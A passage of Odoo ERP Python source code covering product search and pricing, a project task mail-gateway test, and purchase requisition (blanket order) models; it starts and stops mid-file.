result.append(temp)
else:
mydict = {
'id': product.id,
'name': name,
'default_code': product.default_code,
}
result.append(_name_get(mydict))
return result
@api.model
def _name_search(self, name, args=None, operator='ilike', limit=100, name_get_uid=None):
if not args:
args = []
if name:
positive_operators = ['=', 'ilike', '=ilike', 'like', '=like']
product_ids = []
if operator in positive_operators:
product_ids = self._search([('default_code', '=', name)] + args, limit=limit, access_rights_uid=name_get_uid)
if not product_ids:
product_ids = self._search([('barcode', '=', name)] + args, limit=limit, access_rights_uid=name_get_uid)
if not product_ids and operator not in expression.NEGATIVE_TERM_OPERATORS:
# Do not merge the 2 next lines into one single search, SQL search performance would be abysmal
# on a database with thousands of matching products, due to the huge merge+unique needed for the
# OR operator (and given the fact that the 'name' lookup results come from the ir.translation table
# Performing a quick memory merge of ids in Python will give much better performance
product_ids = self._search(args + [('default_code', operator, name)], limit=limit)
if not limit or len(product_ids) < limit:
# we may underrun the limit because of dupes in the results, that's fine
limit2 = (limit - len(product_ids)) if limit else False
product2_ids = self._search(args + [('name', operator, name), ('id', 'not in', product_ids)], limit=limit2, access_rights_uid=name_get_uid)
product_ids.extend(product2_ids)
elif not product_ids and operator in expression.NEGATIVE_TERM_OPERATORS:
domain = expression.OR([
['&', ('default_code', operator, name), ('name', operator, name)],
['&', ('default_code', '=', False), ('name', operator, name)],
])
domain = expression.AND([args, domain])
product_ids = self._search(domain, limit=limit, access_rights_uid=name_get_uid)
if not product_ids and operator in positive_operators:
ptrn = re.compile('(\[(.*?)\])')
res = ptrn.search(name)
if res:
product_ids = self._search([('default_code', '=', res.group(2))] + args, limit=limit, access_rights_uid=name_get_uid)
# still no results, partner in context: search on supplier info as last hope to find something
if not product_ids and self._context.get('partner_id'):
suppliers_ids = self.env['product.supplierinfo']._search([
('name', '=', self._context.get('partner_id')),
'|',
('product_code', operator, name),
('product_name', operator, name)], access_rights_uid=name_get_uid)
if suppliers_ids:
product_ids = self._search([('product_tmpl_id.seller_ids', 'in', suppliers_ids)], limit=limit, access_rights_uid=name_get_uid)
else:
product_ids = self._search(args, limit=limit, access_rights_uid=name_get_uid)
return self.browse(product_ids).name_get()
@api.model
def view_header_get(self, view_id, view_type):
res = super(ProductProduct, self).view_header_get(view_id, view_type)
if self._context.get('categ_id'):
return _('Products: ') + self.env['product.category'].browse(self._context['categ_id']).name
return res
@api.multi
def open_product_template(self):
""" Utility method used to add an "Open Template" button in product views """
self.ensure_one()
return {'type': 'ir.actions.act_window',
'res_model': 'product.template',
'view_mode': 'form',
'res_id': self.product_tmpl_id.id,
'target': 'new'}
def _prepare_sellers(self, params):
return self.seller_ids
@api.multi
def _select_seller(self, partner_id=False, quantity=0.0, date=None, uom_id=False, params=False):
self.ensure_one()
if date is None:
date = fields.Date.context_today(self)
precision = self.env['decimal.precision'].precision_get('Product Unit of Measure')
res = self.env['product.supplierinfo']
sellers = self._prepare_sellers(params)
if self.env.context.get('force_company'):
sellers = sellers.filtered(lambda s: not s.company_id or s.company_id.id == self.env.context['force_company'])
for seller in sellers:
# Set quantity in UoM of seller
quantity_uom_seller = quantity
if quantity_uom_seller and uom_id and uom_id != seller.product_uom:
quantity_uom_seller = uom_id._compute_quantity(quantity_uom_seller, seller.product_uom)
if seller.date_start and seller.date_start > date:
continue
if seller.date_end and seller.date_end < date:
continue
if partner_id and seller.name not in [partner_id, partner_id.parent_id]:
continue
if float_compare(quantity_uom_seller, seller.min_qty, precision_digits=precision) == -1:
continue
if seller.product_id and seller.product_id != self:
continue
res |= seller
break
return res
@api.multi
def price_compute(self, price_type, uom=False, currency=False, company=False):
# TDE FIXME: delegate to template or not ? fields are reencoded here ...
# compatibility about context keys used a bit everywhere in the code
if not uom and self._context.get('uom'):
uom = self.env['uom.uom'].browse(self._context['uom'])
if not currency and self._context.get('currency'):
currency = self.env['res.currency'].browse(self._context['currency'])
products = self
if price_type == 'standard_price':
# standard_price field can only be seen by users in base.group_user
# Thus, in order to compute the sale price from the cost for users not in this group
# We fetch the standard price as the superuser
products = self.with_context(force_company=company and company.id or self._context.get('force_company', self.env.user.company_id.id)).sudo()
prices = dict.fromkeys(self.ids, 0.0)
for product in products:
prices[product.id] = product[price_type] or 0.0
if price_type == 'list_price':
prices[product.id] += product.price_extra
# we need to add the price from the attributes that do not generate variants
# (see field product.attribute create_variant)
if self._context.get('no_variant_attributes_price_extra'):
# we have a list of price_extra that comes from the attribute values, we need to sum all that
prices[product.id] += sum(self._context.get('no_variant_attributes_price_extra'))
if uom:
prices[product.id] = product.uom_id._compute_price(prices[product.id], uom)
# Convert from current user company currency to asked one
# This is right cause a field cannot be in more than one currency
if currency:
prices[product.id] = product.currency_id._convert(
prices[product.id], currency, product.company_id, fields.Date.today())
return prices
# compatibility to remove after v10 - DEPRECATED
@api.multi
def price_get(self, ptype='list_price'):
return self.price_compute(ptype)
@api.multi
def _set_standard_price(self, value):
''' Store the standard price change in order to be able to retrieve the cost of a product for a given date'''
PriceHistory = self.env['product.price.history']
for product in self:
PriceHistory.create({
'product_id': product.id,
'cost': value,
'company_id': self._context.get('force_company', self.env.user.company_id.id),
})
@api.multi
def get_history_price(self, company_id, date=None):
history = self.env['product.price.history'].search([
('company_id', '=', company_id),
('product_id', 'in', self.ids),
('datetime', '<=', date or fields.Datetime.now())], order='datetime desc,id desc', limit=1)
return history.cost or 0.0
@api.model
def get_empty_list_help(self, help):
self = self.with_context(
empty_list_help_document_name=_("product"),
)
return super(ProductProduct, self).get_empty_list_help(help)
def get_product_multiline_description_sale(self):
""" Compute a multiline description of this product, in the context of sales
(do not use for purchases or other display reasons that don't intend to use "description_sale").
It will often be used as the default description of a sale order line referencing this product.
"""
name = self.display_name
if self.description_sale:
name += '\n' + self.description_sale
return name
def _has_valid_attributes(self, valid_attributes, valid_values):
""" Check if a product has valid attributes. It is considered valid if:
- it uses ALL valid attributes
- it ONLY uses valid values
We must make sure that all attributes are used to take into account the case where
attributes would be added to the template.
This method does not check if the combination is possible, it just
checks if it has valid attributes and values. A possible combination
is always valid, but a valid combination is not always possible.
:param valid_attributes: a recordset of product.attribute
:param valid_values: a recordset of product.attribute.value
:return: True if the attibutes and values are correct, False instead
"""
self.ensure_one()
values = self.attribute_value_ids
attributes = values.mapped('attribute_id')
if attributes != valid_attributes:
return False
for value in values:
if value not in valid_values:
return False
return True
@api.multi
def _is_variant_possible(self, parent_combination=None):
"""Return whether the variant is possible based on its own combination,
and optionally a parent combination.
See `_is_combination_possible` for more information.
This will always exclude variants for templates that have `no_variant`
attributes because the variant itself will not be the full combination.
:param parent_combination: combination from which `self` is an
optional or accessory product.
:type parent_combination: recordset `product.template.attribute.value`
:return: ẁhether the variant is possible based on its own combination
:rtype: bool
"""
self.ensure_one()
return self.product_tmpl_id._is_combination_possible(self.product_template_attribute_value_ids, parent_combination=parent_combination)
class ProductPackaging(models.Model):
_name = "product.packaging"
_description = "Product Packaging"
_order = 'sequence'
name = fields.Char('Package Type', required=True)
sequence = fields.Integer('Sequence', default=1, help="The first in the sequence is the default one.")
product_id = fields.Many2one('product.product', string='Product')
qty = fields.Float('Contained Quantity', help="The total number of products you can have per pallet or box.")
barcode = fields.Char('Barcode', copy=False, help="Barcode used for packaging identification.")
product_uom_id = fields.Many2one('uom.uom', related='product_id.uom_id', readonly=True)
class SupplierInfo(models.Model):
_name = "product.supplierinfo"
_description = "Supplier Pricelist"
_order = 'sequence, min_qty desc, price'
name = fields.Many2one(
'res.partner', 'Vendor',
domain=[('supplier', '=', True)], ondelete='cascade', required=True,
help="Vendor of this product")
product_name = fields.Char(
'Vendor Product Name',
help="This vendor's product name will be used when printing a request for quotation. Keep empty to use the internal one.")
product_code = fields.Char(
'Vendor Product Code',
help="This vendor's product code will be used when printing a request for quotation. Keep empty to use the internal one.")
sequence = fields.Integer(
'Sequence', default=1, help="Assigns the priority to the list of product vendor.")
product_uom = fields.Many2one(
'uom.uom', 'Unit of Measure',
related='product_tmpl_id.uom_po_id',
help="This comes from the product form.")
min_qty = fields.Float(
'Minimal Quantity', default=0.0, required=True,
help="The minimal quantity to purchase from this vendor, expressed in the vendor Product Unit of Measure if not any, in the default unit of measure of the product otherwise.")
price = fields.Float(
'Price', default=0.0, digits=dp.get_precision('Product Price'),
required=True, help="The price to purchase a product")
company_id = fields.Many2one(
'res.company', 'Company',
default=lambda self: self.env.user.company_id.id, index=1)
currency_id = fields.Many2one(
'res.currency', 'Currency',
default=lambda self: self.env.user.company_id.currency_id.id,
required=True)
date_start = fields.Date('Start Date', help="Start date for this vendor price")
date_end = fields.Date('End Date', help="End date for this vendor price")
product_id = fields.Many2one(
'product.product', 'Product Variant',
help="If not set, the vendor price will apply to all variants of this product.")
product_tmpl_id = fields.Many2one(
'product.template', 'Product Template',
index=True, ondelete='cascade', oldname='product_id')
product_variant_count = fields.Integer('Variant Count', related='product_tmpl_id.product_variant_count', readonly=False)
delay = fields.Integer(
'Delivery Lead Time', default=1, required=True,
help="Lead time in days between the confirmation of the purchase order and the receipt of the products in your warehouse. Used by the scheduler for automatic computation of the purchase order planning.")
@api.model
def get_import_templates(self):
return [{
'label': _('Import Template for Vendor Pricelists'),
'template': '/product/static/xls/product_supplierinfo.xls'
}]
```
#### File: project/tests/test_project_flow.py
```python
import base64
from .test_project_base import TestProjectBase
from odoo.tools import mute_logger
from odoo.modules.module import get_resource_path
EMAIL_TPL = """Return-Path: <<EMAIL>>
X-Original-To: {to}
Delivered-To: {to}
To: {to}
cc: {cc}
Received: by mail1.odoo.com (Postfix, from userid 10002)
id 5DF9ABFB2A; Fri, 10 Aug 2012 16:16:39 +0200 (CEST)
Message-ID: {msg_id}
Date: Tue, 29 Nov 2011 12:43:21 +0530
From: {email_from}
MIME-Version: 1.0
Subject: {subject}
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Hello,
This email should create a new entry in your module. Please check that it
effectively works.
Thanks,
--
<NAME>
Integrator at Agrolait"""
class TestProjectFlow(TestProjectBase):
def test_project_process_project_manager_duplicate(self):
pigs = self.project_pigs.sudo(self.user_projectmanager)
dogs = pigs.copy()
self.assertEqual(len(dogs.tasks), 2, 'project: duplicating a project must duplicate its tasks')
@mute_logger('odoo.addons.mail.mail_thread')
def test_task_process_without_stage(self):
# Do: incoming mail from an unknown partner on an alias creates a new task 'Frogs'
task = self.format_and_process(
EMAIL_TPL, to='<EMAIL>, <EMAIL>', cc='<EMAIL>',
email_from='%s' % self.user_projectuser.email,
subject='Frogs', msg_id='<1198923581.41972151<EMAIL>>',
target_model='project.task')
# Test: one task created by mailgateway administrator
self.assertEqual(len(task), 1, 'project: message_process: a new project.task should have been created')
# Test: check partner in message followers
self.assertIn(self.partner_2, task.message_partner_ids, "Partner in message cc is not added as a task followers.")
# Test: messages
self.assertEqual(len(task.message_ids), 2,
'project: message_process: newly created task should have 2 messages: creation and email')
self.assertEqual(task.message_ids[0].author_id, self.user_projectuser.partner_id,
'project: message_process: second message should be the one from Agrolait (partner failed)')
self.assertEqual(task.message_ids[0].subject, 'Frogs',
'project: message_process: second message should be the one from Agrolait (subject failed)')
# Test: task content
self.assertEqual(task.name, 'Frogs', 'project_task: name should be the email subject')
self.assertEqual(task.project_id.id, self.project_pigs.id, 'project_task: incorrect project')
self.assertEqual(task.stage_id.sequence, False, "project_task: shouldn't have a stage, i.e. sequence=False")
@mute_logger('odoo.addons.mail.mail_thread')
def test_task_process_with_stages(self):
# Do: incoming mail from an unknown partner on an alias creates a new task 'Cats'
task = self.format_and_process(
EMAIL_TPL, to='<EMAIL>, <EMAIL>', cc='<EMAIL>',
email_from='%s' % self.user_projectuser.email,
subject='Cats', msg_id='<119892358<EMAIL>1972<EMAIL>>',
target_model='project.task')
# Test: one task created by mailgateway administrator
self.assertEqual(len(task), 1, 'project: message_process: a new project.task should have been created')
# Test: check partner in message followers
self.assertIn(self.partner_2, task.message_partner_ids, "Partner in message cc is not added as a task followers.")
# Test: messages
self.assertEqual(len(task.message_ids), 2,
'project: message_process: newly created task should have 2 messages: creation and email')
self.assertEqual(task.message_ids[1].subtype_id, self.env.ref('project.mt_task_new'),
'project: message_process: first message of new task should have Task Created subtype')
self.assertEqual(task.message_ids[0].author_id, self.user_projectuser.partner_id,
'project: message_process: second message should be the one from Agrolait (partner failed)')
self.assertEqual(task.message_ids[0].subject, 'Cats',
'project: message_process: second message should be the one from Agrolait (subject failed)')
# Test: task content
self.assertEqual(task.name, 'Cats', 'project_task: name should be the email subject')
self.assertEqual(task.project_id.id, self.project_goats.id, 'project_task: incorrect project')
self.assertEqual(task.stage_id.sequence, 1, "project_task: should have a stage with sequence=1")
def test_subtask_process(self):
""" Check subtask mecanism and change it from project. """
Task = self.env['project.task'].with_context({'tracking_disable': True})
parent_task = Task.create({
'name': '<NAME>',
'user_id': self.user_projectuser.id,
'project_id': self.project_pigs.id,
'partner_id': self.partner_2.id,
'planned_hours': 12,
})
child_task = Task.create({
'name': '<NAME>',
'parent_id': parent_task.id,
'project_id': self.project_pigs.id,
'planned_hours': 3,
})
self.assertEqual(parent_task.partner_id, child_task.partner_id, "Subtask should have the same partner than its parent")
self.assertEqual(parent_task.subtask_count, 1, "Parent task should have 1 child")
self.assertEqual(parent_task.subtask_planned_hours, 3, "Planned hours of subtask should impact parent task")
# change project
child_task.write({
'project_id': self.project_goats.id # customer is partner_1
})
self.assertEqual(parent_task.partner_id, child_task.partner_id, "Subtask partner should not change when changing project")
def test_rating(self):
"""Check if rating works correctly even when task is changed from project A to project B"""
Task = self.env['project.task'].with_context({'tracking_disable': True})
first_task = Task.create({
'name': '<NAME>',
'user_id': self.user_projectuser.id,
'project_id': self.project_pigs.id,
'partner_id': self.partner_2.id,
})
self.assertEqual(first_task.rating_count, 0, "Task should have no rating associated with it")
Rating = self.env['rating.rating']
rating_good = Rating.create({
'res_model_id': self.env['ir.model']._get('project.task').id,
'res_id': first_task.id,
'parent_res_model_id': self.env['ir.model']._get('project.project').id,
'parent_res_id': self.project_pigs.id,
'rated_partner_id': self.partner_2.id,
'partner_id': self.partner_2.id,
'rating': 10,
'consumed': False,
})
rating_bad = Rating.create({
'res_model_id': self.env['ir.model']._get('project.task').id,
'res_id': first_task.id,
'parent_res_model_id': self.env['ir.model']._get('project.project').id,
'parent_res_id': self.project_pigs.id,
'rated_partner_id': self.partner_2.id,
'partner_id': self.partner_2.id,
'rating': 5,
'consumed': True,
})
# We need to invalidate cache since it is not done automatically by the ORM
# Our One2Many is linked to a res_id (int) for which the orm doesn't create an inverse
first_task.invalidate_cache()
self.assertEqual(rating_good.rating_text, 'satisfied')
self.assertEqual(rating_bad.rating_text, 'not_satisfied')
self.assertEqual(first_task.rating_count, 1, "Task should have only one rating associated, since one is not consumed")
self.assertEqual(rating_good.parent_res_id, self.project_pigs.id)
self.assertEqual(self.project_goats.percentage_satisfaction_task, -1)
self.assertEqual(self.project_pigs.percentage_satisfaction_task, -1)
# Consuming rating_good
first_task.rating_apply(10, rating_good.access_token)
# We need to invalidate cache since it is not done automatically by the ORM
# Our One2Many is linked to a res_id (int) for which the orm doesn't create an inverse
first_task.invalidate_cache()
self.assertEqual(first_task.rating_count, 2, "Task should have two ratings associated with it")
self.assertEqual(rating_good.parent_res_id, self.project_pigs.id)
self.assertEqual(self.project_goats.percentage_satisfaction_task, -1)
self.assertEqual(self.project_pigs.percentage_satisfaction_task, 50)
# We change the task from project_pigs to project_goats, ratings should be associated with the new project
first_task.project_id = self.project_goats.id
# We need to invalidate cache since it is not done automatically by the ORM
# Our One2Many is linked to a res_id (int) for which the orm doesn't create an inverse
first_task.invalidate_cache()
self.assertEqual(rating_good.parent_res_id, self.project_goats.id)
self.assertEqual(self.project_goats.percentage_satisfaction_task, 50)
self.assertEqual(self.project_pigs.percentage_satisfaction_task, -1)
```
#### File: purchase_mrp/models/purchase_mrp.py
```python
from odoo import fields, models
from odoo.tools import float_compare
class MrpProduction(models.Model):
_inherit = 'mrp.production'
def _get_document_iterate_key(self, move_raw_id):
return super(MrpProduction, self)._get_document_iterate_key(move_raw_id) or 'created_purchase_line_id'
class PurchaseOrderLine(models.Model):
_inherit = 'purchase.order.line'
def _update_received_qty(self):
super(PurchaseOrderLine, self)._update_received_qty()
for line in self.filtered(lambda x: x.move_ids and x.product_id.id not in x.move_ids.mapped('product_id').ids):
bom = self.env['mrp.bom']._bom_find(product=line.product_id, company_id=line.company_id.id)
if bom and bom.type == 'phantom':
line.qty_received = line._get_bom_delivered(bom=bom)
def _get_bom_delivered(self, bom=False):
self.ensure_one()
# In the case of a kit, we need to check if all components are shipped. Since the BOM might
# have changed, we don't compute the quantities but verify the move state.
if bom:
moves = self.move_ids.filtered(lambda m: m.picking_id and m.picking_id.state != 'cancel')
bom_delivered = all([move.state == 'done' for move in moves])
if bom_delivered:
return self.product_qty
else:
return 0.0
def _get_upstream_documents_and_responsibles(self, visited):
return [(self.order_id, self.order_id.user_id, visited)]
class StockMove(models.Model):
_inherit = 'stock.move'
def _prepare_phantom_move_values(self, bom_line, quantity):
vals = super(StockMove, self)._prepare_phantom_move_values(bom_line, quantity)
if self.purchase_line_id:
vals['purchase_line_id'] = self.purchase_line_id.id
return vals
```
#### File: purchase_requisition/models/purchase_requisition.py
```python
from datetime import datetime, time
from odoo import api, fields, models, _
from odoo.addons import decimal_precision as dp
from odoo.exceptions import UserError
PURCHASE_REQUISITION_STATES = [
('draft', 'Draft'),
('ongoing', 'Ongoing'),
('in_progress', 'Confirmed'),
('open', 'Bid Selection'),
('done', 'Closed'),
('cancel', 'Cancelled')
]
class PurchaseRequisitionType(models.Model):
_name = "purchase.requisition.type"
_description = "Purchase Requisition Type"
_order = "sequence"
name = fields.Char(string='Agreement Type', required=True, translate=True)
sequence = fields.Integer(default=1)
exclusive = fields.Selection([
('exclusive', 'Select only one RFQ (exclusive)'), ('multiple', 'Select multiple RFQ')],
string='Agreement Selection Type', required=True, default='multiple',
help="""Select only one RFQ (exclusive): when a purchase order is confirmed, cancel the remaining purchase order.\n
Select multiple RFQ: allows multiple purchase orders. On confirmation of a purchase order it does not cancel the remaining orders""")
quantity_copy = fields.Selection([
('copy', 'Use quantities of agreement'), ('none', 'Set quantities manually')],
string='Quantities', required=True, default='none')
line_copy = fields.Selection([
('copy', 'Use lines of agreement'), ('none', 'Do not create RfQ lines automatically')],
string='Lines', required=True, default='copy')
class PurchaseRequisition(models.Model):
_name = "purchase.requisition"
_description = "Purchase Requisition"
_inherit = ['mail.thread']
_order = "id desc"
def _get_picking_in(self):
pick_in = self.env.ref('stock.picking_type_in', raise_if_not_found=False)
company = self.env['res.company']._company_default_get('purchase.requisition')
if not pick_in or pick_in.sudo().warehouse_id.company_id.id != company.id:
pick_in = self.env['stock.picking.type'].search(
[('warehouse_id.company_id', '=', company.id), ('code', '=', 'incoming')],
limit=1,
)
return pick_in
def _get_type_id(self):
return self.env['purchase.requisition.type'].search([], limit=1)
name = fields.Char(string='Agreement Reference', required=True, copy=False, default='New', readonly=True)
origin = fields.Char(string='Source Document')
order_count = fields.Integer(compute='_compute_orders_number', string='Number of Orders')
vendor_id = fields.Many2one('res.partner', string="Vendor")
type_id = fields.Many2one('purchase.requisition.type', string="Agreement Type", required=True, default=_get_type_id)
ordering_date = fields.Date(string="Ordering Date", track_visibility='onchange')
date_end = fields.Datetime(string='Agreement Deadline', track_visibility='onchange')
schedule_date = fields.Date(string='Delivery Date', index=True, help="The expected and scheduled delivery date where all the products are received", track_visibility='onchange')
user_id = fields.Many2one('res.users', string='Purchase Representative', default= lambda self: self.env.user)
description = fields.Text()
company_id = fields.Many2one('res.company', string='Company', required=True, default=lambda self: self.env['res.company']._company_default_get('purchase.requisition'))
purchase_ids = fields.One2many('purchase.order', 'requisition_id', string='Purchase Orders', states={'done': [('readonly', True)]})
line_ids = fields.One2many('purchase.requisition.line', 'requisition_id', string='Products to Purchase', states={'done': [('readonly', True)]}, copy=True)
warehouse_id = fields.Many2one('stock.warehouse', string='Warehouse')
state = fields.Selection(PURCHASE_REQUISITION_STATES,
'Status', track_visibility='onchange', required=True,
copy=False, default='draft')
state_blanket_order = fields.Selection(PURCHASE_REQUISITION_STATES, compute='_set_state')
picking_type_id = fields.Many2one('stock.picking.type', 'Operation Type', required=True, default=_get_picking_in)
is_quantity_copy = fields.Selection(related='type_id.quantity_copy', readonly=True)
currency_id = fields.Many2one('res.currency', 'Currency', required=True,
default=lambda self: self.env.user.company_id.currency_id.id)
@api.depends('state')
def _set_state(self):
self.state_blanket_order = self.state
@api.onchange('vendor_id')
def _onchange_vendor(self):
requisitions = self.env['purchase.requisition'].search([
('vendor_id', '=', self.vendor_id.id),
('state', '=', 'ongoing'),
('type_id.quantity_copy', '=', 'none'),
])
if any(requisitions):
title = _("Warning for %s") % self.vendor_id.name
message = _("There is already an open blanket order for this supplier. We suggest you to use to complete this open blanket order instead of creating a new one.")
warning = {
'title': title,
'message': message
}
return {'warning': warning}
@api.multi
@api.depends('purchase_ids')
def _compute_orders_number(self):
for requisition in self:
requisition.order_count = len(requisition.purchase_ids)
@api.multi
def action_cancel(self):
# try to set all associated quotations to cancel state
for requisition in self:
for requisition_line in requisition.line_ids:
requisition_line.supplier_info_ids.unlink()
requisition.purchase_ids.button_cancel()
for po in requisition.purchase_ids:
po.message_post(body=_('Cancelled by the agreement associated to this quotation.'))
self.write({'state': 'cancel'})
@api.multi
def action_in_progress(self):
self.ensure_one()
if not all(obj.line_ids for obj in self):
raise UserError(_("You cannot confirm agreement '%s' because there is no product line.") % self.name)
if self.type_id.quantity_copy == 'none' and self.vendor_id:
for requisition_line in self.line_ids:
if requisition_line.price_unit <= 0.0:
raise UserError(_('You cannot confirm the blanket order without price.'))
if requisition_line.product_qty <= 0.0:
raise UserError(_('You cannot confirm the blanket order without quantity.'))
requisition_line.create_supplier_info()
self.write({'state': 'ongoing'})
else:
self.write({'state': 'in_progress'})
# Set the sequence number regarding the requisition type
if self.name == 'New':
if self.is_quantity_copy != 'none':
self.name = self.env['ir.sequence'].next_by_code('purchase.requisition.purchase.tender')
else:
self.name = self.env['ir.sequence'].next_by_code('purchase.requisition.blanket.order')
@api.multi
def action_open(self):
self.write({'state': 'open'})
def action_draft(self):
self.ensure_one()
self.name = 'New'
self.write({'state': 'draft'})
@api.multi
def action_done(self):
"""
Generate all purchase order based on selected lines, should only be called on one agreement at a time
"""
if any(purchase_order.state in ['draft', 'sent', 'to approve'] for purchase_order in self.mapped('purchase_ids')):
raise UserError(_('You have to cancel or validate every RfQ before closing the purchase requisition.'))
for requisition in self:
for requisition_line in requisition.line_ids:
requisition_line.supplier_info_ids.unlink()
self.write({'state': 'done'})
def _prepare_tender_values(self, product_id, product_qty, product_uom, location_id, name, origin, values):
return{
'origin': origin,
'date_end': values['date_planned'],
'warehouse_id': values.get('warehouse_id') and values['warehouse_id'].id or False,
'company_id': values['company_id'].id,
'line_ids': [(0, 0, {
'product_id': product_id.id,
'product_uom_id': product_uom.id,
'product_qty': product_qty,
'move_dest_id': values.get('move_dest_ids') and values['move_dest_ids'][0].id or False,
})],
}
def unlink(self):
if any(requisition.state not in ('draft', 'cancel') for requisition in self):
raise UserError(_('You can only delete draft requisitions.'))
# Draft requisitions could have some requisition lines.
self.mapped('line_ids').unlink()
return super(PurchaseRequisition, self).unlink()
class SupplierInfo(models.Model):
_inherit = "product.supplierinfo"
_order = 'sequence, purchase_requisition_id desc, min_qty desc, price'
purchase_requisition_id = fields.Many2one('purchase.requisition', related='purchase_requisition_line_id.requisition_id', string='Blanket order', readonly=False)
purchase_requisition_line_id = fields.Many2one('purchase.requisition.line')
class PurchaseRequisitionLine(models.Model):
_name = "purchase.requisition.line"
_description = "Purchase Requisition Line"
_rec_name = 'product_id'
product_id = fields.Many2one('product.product', string='Product', domain=[('purchase_ok', '=', True)], required=True)
product_uom_id = fields.Many2one('uom.uom', string='Product Unit of Measure')
product_qty = fields.Float(string='Quantity', digits=dp.get_precision('Product Unit of Measure'))
price_unit = fields.Float(string='Unit Price', digits=dp.get_precision('Product Price'))
qty_ordered = fields.Float(compute='_compute_ordered_qty', string='Ordered Quantities')
requisition_id = fields.Many2one('purchase.requisition', required=True, string='Purchase Agreement', ondelete='cascade')
company_id = fields.Many2one('res.company', related='requisition_id.company_id', string='Company', store=True, readonly=True, default= lambda self: self.env['res.company']._company_default_get('purchase.requisition.line'))
account_analytic_id = fields.Many2one('account.analytic.account', string='Analytic Account')
analytic_tag_ids = fields.Many2many('account.analytic.tag', string='Analytic Tags')
schedule_date = fields.Date(string='Scheduled Date')
move_dest_id = fields.Many2one('stock.move', 'Downstream Move')
supplier_info_ids = fields.One2many('product.supplierinfo', 'purchase_requisition_line_id')
@api.model
def create(self,vals):
res = super(PurchaseRequisitionLine, self).create(vals)
if res.requisition_id.state not in ['draft', 'cancel', 'done'] and res.requisition_id.is_quantity_copy == 'none':
supplier_infos = self.env['product.supplierinfo'].search([
('product_id', '=', vals.get('product_id')),
('name', '=', res.requisition_id.vendor_id.id),
])
if not any([s.purchase_requisition_id for s in supplier_infos]):
res.create_supplier_info()
if vals['price_unit'] <= 0.0:
raise UserError(_('You cannot confirm the blanket order without price.'))
return res
@api.multi
def write(self, vals):
res = super(PurchaseRequisitionLine, self).write(vals)
if 'price_unit' in vals:
if vals['price_unit'] <= 0.0:
raise UserError(_('You cannot confirm the blanket order without price.'))
# If the price is updated, we have to update the related SupplierInfo
self.supplier_info_ids.write({'price': vals['price_unit']})
return res
def unlink(self):
to_unlink = self.filtered(lambda r: r.requisition_id.state not in ['draft', 'cancel', 'done'])
to_unlink.mapped('supplier_info_ids').unlink()
return super(PurchaseRequisitionLine, self).unlink()
def create_supplier_info(self):
purchase_requisition = self.requisition_id
if purchase_requisition.type_id.quantity_copy == 'none' and purchase_requisition.vendor_id:
# create a supplier_info only in case of blanket order
self.env['product.supplierinfo'].create({
'name': purchase_requisition.vendor_id.id,
'product_id': self.product_id.id,
'product_tmpl_id': self.product_id.product_tmpl_id.id,
'price': self.price_unit,
'currency_id': self.requisition_id.currency_id.id,
'purchase_requisition_id': purchase_requisition.id,
'purchase_requisition_line_id': self.id,
})
@api.multi
@api.depends('requisition_id.purchase_ids.state')
def _compute_ordered_qty(self):
for line in self:
total = 0.0
for po in line.requisition_id.purchase_ids.filtered(lambda purchase_order: purchase_order.state in ['purchase', 'done']):
for po_line in po.order_line.filtered(lambda order_line: order_line.product_id == line.product_id):
if po_line.product_uom != line.product_uom_id:
total += po_line.product_uom._compute_quantity(po_line.product_qty, line.product_uom_id)
else:
total += po_line.product_qty
line.qty_ordered = total
@api.onchange('product_id')
def _onchange_product_id(self):
if self.product_id:
self.product_uom_id = self.product_id.uom_po_id
self.product_qty = 1.0
if not self.schedule_date:
self.schedule_date = self.requisition_id.schedule_date
@api.multi
def _prepare_purchase_order_line(self, name, product_qty=0.0, price_unit=0.0, taxes_ids=False):
self.ensure_one()
requisition = self.requisition_id
if requisition.schedule_date:
date_planned = datetime.combine(requisition.schedule_date, time.min)
else:
date_planned = datetime.now()
return {
'name': name,
'product_id': self.product_id.id,
'product_uom': self.product_id.uom_po_id.id,
'product_qty': product_qty,
'price_unit': price_unit,
'taxes_id': [(6, 0, taxes_ids)],
'date_planned': date_planned,
'account_analytic_id': self.account_analytic_id.id,
'analytic_tag_ids': self.analytic_tag_ids.ids,
'move_dest_ids': self.move_dest_id and [(4, self.move_dest_id.id)] or []
}
class PurchaseOrder(models.Model):
_inherit = "purchase.order"
requisition_id = fields.Many2one('purchase.requisition', string='Purchase Agreement', copy=False)
is_quantity_copy = fields.Selection(related='requisition_id.is_quantity_copy', readonly=False)
@api.onchange('requisition_id')
def _onchange_requisition_id(self):
if not self.requisition_id:
return
requisition = self.requisition_id
if self.partner_id:
partner = self.partner_id
else:
partner = requisition.vendor_id
payment_term = partner.property_supplier_payment_term_id
FiscalPosition = self.env['account.fiscal.position']
fpos = FiscalPosition.get_fiscal_position(partner.id)
fpos = FiscalPosition.browse(fpos)
self.partner_id = partner.id
self.fiscal_position_id = fpos.id
self.payment_term_id = payment_term.id
self.company_id = requisition.company_id.id
self.currency_id = requisition.currency_id.id
if not self.origin or requisition.name not in self.origin.split(', '):
if self.origin:
if requisition.name:
self.origin = self.origin + ', ' + requisition.name
else:
self.origin = requisition.name
self.notes = requisition.description
self.date_order = fields.Datetime.now()
self.picking_type_id = requisition.picking_type_id.id
if requisition.type_id.line_copy != 'copy':
return
# Create PO lines if necessary
order_lines = []
for line in requisition.line_ids:
# Compute name
product_lang = line.product_id.with_context({
'lang': partner.lang,
'partner_id': partner.id,
})
name = product_lang.display_name
if product_lang.description_purchase:
name += '\n' + product_lang.description_purchase
# Compute taxes
if fpos:
taxes_ids = fpos.map_tax(line.product_id.supplier_taxes_id.filtered(lambda tax: tax.company_id == requisition.company_id)).ids
else:
taxes_ids = line.product_id.supplier_taxes_id.filtered(lambda tax: tax.company_id == requisition.company_id).ids
# Compute quantity and price_unit
if line.product_uom_id != line.product_id.uom_po_id:
product_qty = line.product_uom_id._compute_quantity(line.product_qty, line.product_id.uom_po_id)
price_unit = line.product_uom_id._compute_price(line.price_unit, line.product_id.uom_po_id)
else:
product_qty = line.product_qty
price_unit = line.price_unit
if requisition.type_id.quantity_copy != 'copy':
product_qty = 0
# Create PO line
order_line_values = line._prepare_purchase_order_line(
name=name, product_qty=product_qty, price_unit=price_unit,
taxes_ids=taxes_ids)
order_lines.append((0, 0, order_line_values))
self.order_line = order_lines
@api.multi
def button_approve(self, force=False):
res = super(PurchaseOrder, self).button_approve(force=force)
for po in self:
if not po.requisition_id:
continue
if po.requisition_id.type_id.exclusive == 'exclusive':
others_po = po.requisition_id.mapped('purchase_ids').filtered(lambda r: r.id != po.id)
others_po.button_cancel()
po.requisition_id.action_done()
return res
@api.model
